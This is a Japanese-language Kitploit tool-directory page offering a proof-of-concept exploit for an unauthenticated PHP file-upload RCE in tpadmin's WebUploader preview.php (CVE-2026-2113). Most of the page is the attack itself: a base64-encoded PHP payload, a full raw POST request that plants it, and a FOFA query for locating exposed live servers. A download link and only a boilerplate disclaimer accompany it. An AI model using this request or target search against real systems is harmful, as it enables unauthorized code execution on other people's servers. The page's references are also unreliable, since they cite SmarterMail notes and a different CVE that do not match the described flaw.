Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
tpadmin-CVE-2026-2113-poc — 認証されていない攻撃者が任意のPHPファイルをWebサーバーに直接アップロードできるようにするリモートコード実行(RCE)脆弱性です。これにより、Webサーバーの権限で即時にリモートコード実行が可能になります。 | Kitploit
ツール/GitHubGitHub/maxmnml/tpadmin-cve-2026-2113-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmaxmnml/tpadmin-cve-2026-2113-poc

tpadmin-CVE-2026-2113-poc

認証されていない攻撃者が任意のPHPファイルをWebサーバーに直接アップロードできるようにするリモートコード実行(RCE)脆弱性です。これにより、Webサーバーの権限で即時にリモートコード実行が可能になります。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
17ヶ月前未レビュー

tpadmin-CVE-2026-2113-poc

任意ファイルアップロードを介して、Webサーバープリビレッジでリモートコード実行を悪用するproof-of-concept。

脆弱性の説明

H-ui.admin システムの WebUploader preview コンポーネントに、重大なリモートコード実行の脆弱性が存在します。<font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> ファイルは適切な認証とファイル検証を欠いているため、認証されていない攻撃者が任意の PHP ファイルをWebサーバーに直接アップロードできます。これにより、Webサーバープリビレッジでの即時リモートコード実行が発生します。

影響を受けるバージョン

  • tpadmin バージョン 1.3.12 まで

PoC (by sTy1H)

  1. ペイロードを構築する(危険なステートメントをbase64でエンコード)
root@kitploit:~
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
  1. ペイロードを含むPOSTリクエストを構築する
root@kitploit:~
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
  1. 返されたURLにアクセスする
画像

実環境での利用

FOFA:

root@kitploit:~
title='Tpadmin'

影響

認証されていないリモートの攻撃者は、任意のファイルアップロードを悪用して、WebサーバープリビレッジでRCEを獲得できます。

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:中

是正と緩和

既知の可能な対策に関する情報はありません。影響を受けるオブジェクトを代替製品に置き換えることが推奨される場合があります。

参考

  • https://github.com/yuan1994/tpAdmin
  • https://www.smartertools.com/smartermail/release-notes/current)
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

免責事項

このツールは、許可されたセキュリティテスト専用です。コンピュータシステムへの不正アクセスは違法です。

ツールをダウンロード